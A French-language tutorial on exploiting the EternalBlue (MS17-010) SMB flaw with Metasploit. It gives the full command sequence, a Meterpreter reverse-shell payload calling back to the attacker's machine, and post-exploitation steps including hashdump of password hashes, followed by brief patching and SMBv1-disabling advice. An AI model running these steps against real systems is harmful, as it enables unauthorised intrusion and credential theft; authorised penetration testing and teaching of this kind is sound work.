⚠️ Avertissement
Ce tutoriel est fourni à des fins éducatives uniquement. L'exploitation de vulnérabilités sur des systèmes sans autorisation explicite est illégale et peut entraîner des poursuites judiciaires. Utilisez ces techniques uniquement sur des systèmes pour lesquels vous avez l'autorisation expresse du propriétaire. Ce tutoriel doit être utilisé dans le cadre de tests de pénétration légitimes afin d'améliorer la sécurité.
Exploitation de la Vulnérabilité SMB EternalBlue
Ce tutoriel détaillé vous guidera à travers les étapes nécessaires pour exploiter la vulnérabilité SMB EternalBlue en utilisant Metasploit. Cette vulnérabilité, également connue sous le nom de MS17-010, a été largement utilisée dans des attaques telles que WannaCry.
Introduction
EternalBlue est une vulnérabilité dans le protocole SMB de Microsoft. Elle permet à un attaquant d'exécuter du code arbitraire à distance sur une machine vulnérable. Cette attaque est particulièrement puissante car elle ne nécessite aucune interaction de l'utilisateur cible.
Comprendre EternalBlue
EternalBlue exploite une faille dans le protocole SMBv1 de Windows. Il s'agit d'une vulnérabilité de type "remote code execution" (RCE) qui permet à un attaquant d'exécuter du code arbitraire à distance. Microsoft a corrigé cette vulnérabilité en mars 2017 via le patch MS17-010, mais de nombreuses machines non mises à jour restent vulnérables.
Prérequis
- Un ordinateur avec Kali Linux
- Metasploit Framework installé (préinstallé sur Kali Linux)
- Accès réseau à une machine vulnérable à EternalBlue (Windows non patché avant mars 2017)
Étape 1: Configuration de Metasploit
Pour commencer, lancez Metasploit en utilisant la commande suivante :
msfconsole
Étape 2: Recherche du Module EternalBlue
Utilisez la commande suivante pour rechercher le module EternalBlue dans Metasploit :
search eternalblue
Étape 3: Configuration du Module
use exploit/windows/smb/ms17_010_eternalblue
set RHOST [IP de la cible]
set LHOST [Votre IP]
set LPORT 4444
Pourquoi ce Payload ?
Nous utilisons le payload windows/x64/meterpreter/reverse_tcp car il permet de créer une connexion "reverse shell". Cela signifie que la machine cible initie la connexion vers notre machine (LHOST) via le port 4444 (LPORT), nous permettant de prendre le contrôle du système à distance.
Étape 4: Sélection du Payload
set payload windows/x64/meterpreter/reverse_tcp
Étape 5: Lancement de l'Exploit
exploit
Étape 6: Post-Exploitation avec Meterpreter
sysinfo # Affiche les informations système
getuid # Affiche l'identifiant de l'utilisateur
hashdump # Récupère les hashes de mots de passe
screenshot # Prend une capture d'écran
shell # Ouvre une session shell sur la cible
Comment se Protéger Contre EternalBlue
- Installez le patch MS17-010, publié par Microsoft en mars 2017.
- Désactivez SMBv1 avec PowerShell :
Disable-WindowsOptionalFeature -Online -FeatureName smb1protocol
💡 Dépannage
- Si l'exploitation échoue, vérifiez que la machine cible est bien vulnérable à MS17-010 en utilisant
nmap. - Vérifiez la connectivité réseau entre votre machine et la cible avec
ping.
Conclusion
Ce tutoriel vous a montré comment exploiter la vulnérabilité SMB EternalBlue pour obtenir un accès non autorisé à une machine vulnérable. Rappelez-vous de n'utiliser ces techniques que sur des systèmes pour lesquels vous avez une autorisation explicite. Utilisez ces connaissances pour améliorer la sécurité des réseaux et des systèmes.